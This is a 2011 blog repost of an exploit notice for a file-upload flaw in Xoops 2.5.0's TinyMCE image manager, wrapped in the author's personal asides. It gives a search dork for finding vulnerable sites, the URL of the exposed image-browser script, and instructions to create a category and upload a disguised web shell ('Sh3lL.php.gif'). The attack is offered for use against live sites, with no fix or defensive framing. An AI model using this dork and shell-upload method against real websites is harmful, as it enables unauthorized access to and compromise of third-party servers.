18 Jun 2011

File Upload Vulnerability Xoops v2.5.0 (Tiny_mce)

Labels:
###
# Title : Xoops v2.5.0 (Tiny_mce) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Upload File/Sh3l1 at (tiny_mce)
# Tested on : [FreeBSD 8.2 (RELEASE)] & [Linux.(Ubuntu 10.10)]
##
# +----+ xXx < Greetings to 'indoushka' at the Jail > xXx +----+
##
# Noting to all my friends and my Family : (my BAC 2011 is bosh) -> BAC 2012 I will be coming !
# > Hredtha fe elMATH mo3amil 6 & fe lePHYSICs mo3almil 6 tani makan m4k4n pffff (x_x) ...
# Sah kont CaVa em3a le Engineering Elicrtic m034mil 7 ! mes ma3andha ma t3aWedh 3la loKhrin3
# +----------+ X==================== S x H x I x T ====================X +----------+
###
 
# (°) D0rk : "Powered by XOOPS 2.5.0 Š 2001-2011"
 
# (+) Exploit & PoC :
 
http://[host]/[path]/class/xoopseditor/tinymce/tinymce/jscripts/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php?target=/
 
# The Access Not Forbidden !
 
# Cre4ting the n3w CAT ,and Upload File Sh3lL.php.gif ... 
 
# (^_^) ! Good Luck ALL ...
|

Friends Blog

Sponsors : Best Google Covers | Desktop Wallpaperslk | PSD Graphics
Copyright © 2012. bedegar - All Rights Reserved
Template Design by Cool Blogger Tutorials | Published by Templates Doctor
Powered by Blogger